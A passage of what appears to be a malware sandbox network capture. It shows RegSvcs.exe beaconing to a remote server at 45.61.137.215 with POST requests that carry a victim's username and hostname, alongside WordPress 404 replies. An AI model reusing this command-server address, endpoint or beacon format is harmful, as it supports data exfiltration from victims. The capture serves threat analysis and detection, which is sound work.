6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 29, 2024 15:45:01.002540112 CEST	224	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessio
May 29, 2024 15:45:01.002547979 CEST	1236	IN	Data Raw: 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 Data Ascii: nStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.wid
May 29, 2024 15:45:01.002648115 CEST	1236	IN	Data Raw: 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 7d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f Data Ascii: "script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",
May 29, 2024 15:45:01.002665043 CEST	1236	IN	Data Raw: 65 70 74 46 6c 61 67 26 26 21 6e 2e 73 75 70 70 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d Data Ascii: eptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&
May 29, 2024 15:45:01.002676010 CEST	1236	IN	Data Raw: 69 64 3d 27 67 6c 6f 62 61 6c 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 62 6f 64 79 7b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 3a 20 23 30 Data Ascii: id='global-styles-inline-css' type='text/css'>body{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red:
May 29, 2024 15:45:01.002685070 CEST	1236	IN	Data Raw: 67 72 61 64 69 65 6e 74 2d 2d 63 6f 6f 6c 2d 74 6f 2d 77 61 72 6d 2d 73 70 65 63 74 72 75 6d 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 37 34 2c 32 33 34 2c 32 32 30 29 20 30 25 2c 72 67 62 28 31 35 31 Data Ascii: gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%,rgb(151,120,209) 20%,rgb(207,42,186) 40%,rgb(238,44,130) 60%,rgb(251,105,98) 80%,rgb(254,248,76) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135de
May 29, 2024 15:45:01.002693892 CEST	1236	IN	Data Raw: 38 30 3a 20 35 2e 30 36 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 68 61 64 6f 77 2d 2d 6e 61 74 75 72 61 6c 3a 20 36 70 78 20 36 70 78 20 39 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 32 29 3b 2d 2d 77 70 2d 2d 70 72 Data Ascii: 80: 5.06rem;--wp--preset--shadow--natural: 6px 6px 9px rgba(0, 0, 0, 0.2);--wp--preset--shadow--deep: 12px 12px 50px rgba(0, 0, 0, 0.4);--wp--preset--shadow--sharp: 6px 6px 0px rgba(0, 0, 0, 0.2);--wp--preset--shadow--outlined: 6px 6px 0px -3p
May 29, 2024 15:45:01.002703905 CEST	776	IN	Data Raw: 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 29 20 21 69 6d Data Ascii: nous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-color{color: var(--wp--preset--c
May 29, 2024 15:45:01.002715111 CEST	1236	IN	Data Raw: 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 77 68 69 74 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 Data Ascii: --wp--preset--color--cyan-bluish-gray) !important;}.has-white-background-color{background-color: var(--wp--preset--color--white) !important;}.has-pale-pink-background-color{background-color: var(--wp--preset--color--pale-pink) !important;}.has

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.9	49782	45.61.137.215	80	7532	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 15:45:01.201417923 CEST	246	OUT	POST /index.php/3b1tenbkyj HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: DCC85916 Content-Length: 145 Connection: close
May 29, 2024 15:45:01.206513882 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
May 29, 2024 15:45:03.698487997 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 29 May 2024 13:45:01 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 29, 2024 15:45:03.698559999 CEST	1236	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
May 29, 2024 15:45:03.698574066 CEST	1236	IN	Data Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
May 29, 2024 15:45:03.698587894 CEST	1236	IN	Data Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21 Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
May 29, 2024 15:45:03.698609114 CEST	1236	IN	Data Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
May 29, 2024 15:45:03.698620081 CEST	1120	IN	Data Raw: 6e 67 65 2d 74 6f 2d 76 69 76 69 64 2d 72 65 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 32 35 35 2c 31 30 35 2c 30 2c 31 29 20 30 25 2c 72 67 62 28 32 30 37 2c 34 36 2c 34 36 29 20 31 30 30 25 29 Data Ascii: nge-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-w
May 29, 2024 15:45:03.698801041 CEST	1236	IN	Data Raw: 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6d 65 64 69 75 6d 3a 20 32 30 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6c 61 72 67 65 3a 20 33 36 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 Data Ascii: p--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5
May 29, 2024 15:45:03.698822975 CEST	1236	IN	Data Raw: 2d 2d 62 6c 61 63 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63 Data Ascii: --black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset--color--pale-pink)
May 29, 2024 15:45:03.698833942 CEST	1236	IN	Data Raw: 2d 2d 77 68 69 74 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 70 61 6c 65 2d 70 69 6e 6b 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 Data Ascii: --white) !important;}.has-pale-pink-background-color{background-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-background-color{background-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange
May 29, 2024 15:45:03.698844910 CEST	672	IN	Data Raw: 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 70 61 6c 65 2d 70 69 6e 6b 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 Data Ascii: p--preset--color--white) !important;}.has-pale-pink-border-color{border-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-border-color{border-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.9	49783	45.61.137.215	80	7532	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 15:45:03.852643013 CEST	246	OUT	POST /index.php/3b1tenbkyj HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: DCC85916 Content-Length: 145 Connection: close
May 29, 2024 15:45:03.857657909 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
May 29, 2024 15:45:06.365297079 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 29 May 2024 13:45:04 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 29, 2024 15:45:06.365319967 CEST	224	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessio
May 29, 2024 15:45:06.365372896 CEST	1236	IN	Data Raw: 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 Data Ascii: nStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.wid
May 29, 2024 15:45:06.365391016 CEST	1236	IN	Data Raw: 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 7d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f Data Ascii: "script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",
May 29, 2024 15:45:06.365406990 CEST	1236	IN	Data Raw: 65 70 74 46 6c 61 67 26 26 21 6e 2e 73 75 70 70 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d Data Ascii: eptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&
May 29, 2024 15:45:06.365425110 CEST	672	IN	Data Raw: 69 64 3d 27 67 6c 6f 62 61 6c 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 62 6f 64 79 7b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 3a 20 23 30 Data Ascii: id='global-styles-inline-css' type='text/css'>body{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red:
May 29, 2024 15:45:06.365442038 CEST	1236	IN	Data Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
May 29, 2024 15:45:06.365467072 CEST	224	IN	Data Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--w
May 29, 2024 15:45:06.365483999 CEST	1236	IN	Data Raw: 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6d 65 64 69 75 6d 3a 20 32 30 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6c 61 72 67 65 3a 20 33 36 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 Data Ascii: p--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5
May 29, 2024 15:45:06.365503073 CEST	224	IN	Data Raw: 2d 2d 62 6c 61 63 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63 Data Ascii: --black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset-

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.9	49784	45.61.137.215	80	7532	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 15:45:06.533178091 CEST	246	OUT	POST /index.php/3b1tenbkyj HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: DCC85916 Content-Length: 145 Connection: close
May 29, 2024 15:45:06.538678885 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
